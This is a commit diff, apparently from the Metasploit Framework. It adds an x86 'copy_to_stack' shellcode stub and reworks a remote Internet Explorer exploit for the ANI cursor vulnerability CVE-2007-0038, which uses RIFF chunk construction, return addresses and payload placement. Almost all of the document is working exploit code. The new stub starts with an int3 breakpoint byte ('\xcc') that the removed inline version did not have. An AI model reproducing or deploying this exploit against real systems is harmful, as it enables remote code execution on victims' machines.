here we go

git-svn-id: file:///home/svn/framework3/trunk@4613 4d416f70-5f16-0410-b530-b9f4589650da

lib/rex/arch/x86.rb

@@ -59,6 +59,29 @@ module X86
 		"\x75\xfa" +                    # jnz 0x10 (start_search)
 		jmp_reg('edi')                  # jmp edi	
 	end
+
+	#
+	# Generates a buffer that will copy memory immediately following the stub
+	# that is generated to be copied to the stack
+	#
+	def self.copy_to_stack(len)
+		# four byte align
+		len = (len + 3) & ~0x3
+
+		stub =
+			"\xcc" + 
+			"\xeb\x0f"+                # jmp _end
+			"\x68" + [len].pack('V')+  # push n
+			"\x59"+                    # pop ecx
+			"\x5e"+                    # pop esi
+			"\x29\xcc"+                # sub esp, ecx
+			"\x89\xe7"+                # mov edi, esp
+			"\xf3\xa4"+                # rep movsb
+			"\xff\xe4"+                # jmp esp
+			"\xe8\xec\xff\xff\xff"     # call _start
+
+		stub
+	end
 	
 	#
 	# This method returns the opcodes that compose a short jump instruction to

modules/exploits/windows/browser/ani_loadimage_chunksize.rb

@@ -60,13 +60,12 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 				},
 			'Payload'        =>
 				{
-					'Space'       => 1024,
+					'Space'       => 1024 + (rand(1000)),
 					'MinNops'     => 32,
 					'Compat'      => 
 						{
 							'ConnectionType' => '-find',
 						},
-							
 					'StackAdjustment' => -3500,
 				},
 			'Platform'       => 'win',
@@ -102,16 +101,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 					# tag contains a short jump into an embedded riff chunk that
 					# makes a long relative jump into the actual payload.
 					#
-					[ 'Windows Vista user32.dll 6.0.6000.16386', 
-					  { 
-					     'Ret'         => 0x700b, 
-					     'Len'         => 2,
-						  
-					     # On Vista, the pages that contain the RIFF are read-only.
-					     # In-place decoders cannot be used.
-					     'Payload'     => { 'EncoderType' => Msf::Encoder::Type::Raw }
-					  } 
-					]
+					[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
 
 				],
 			'DisclosureDate' => 'Mar 28 2007',
@@ -296,22 +286,18 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
 		end
 		
-		# Our ANI file is randomly placed into a read-only segment, the only reliable
-		# solution is to copy our payload back to the stack and execute it there. This
-		# is non-optimal and should be replaced soon.
-		copier =
-			"\xeb\x0f"+              # jmp _end
-			"\x68\x00\x04\x00\x00"+  # push 1024
-			"\x59"+                  # pop ecx
-			"\x5e"+                  # pop esi
-			"\x29\xcc"+              # sub esp, ecx
-			"\x89\xe7"+              # mov edi, esp
-			"\xf3\xa4"+              # rep movsb
-			"\xff\xe4"+              # jmp esp
-			"\xe8\xec\xff\xff\xff"   # call _start
-			
 		# Place the RIFF chunk in front and off we go
-		ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
+		ret  = "RIFF" + [riff.length].pack('V') + riff 
+
+		# We copy the encoded payload to the stack because sometimes the RIFF
+		# image is mapped in read-only pages.  This would prevent in-place
+		# decoders from working, and we can't have that.
+		ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length) 
+
+		# Place the real payload right after it.
+		ret << payload.encoded
+
+		ret
 	end
 
 	# Generates a riff chunk with the first bytes of the data being a relative